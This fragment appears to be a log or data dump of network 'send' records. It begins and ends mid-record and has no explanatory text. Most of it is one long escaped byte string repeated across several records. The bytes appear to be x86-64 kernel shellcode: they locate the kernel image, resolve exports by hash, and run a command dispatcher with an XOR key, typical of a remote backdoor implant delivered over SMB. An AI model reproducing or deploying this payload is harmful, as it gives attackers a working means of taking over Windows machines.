H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE 
L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 15, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 
\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\x8b@\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\xe8@\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 
H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE 
L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 17, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 
\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\x8b@\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\xe8@\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 
H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE 
L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 18, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 
\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\x8b@\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\xe8@\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 
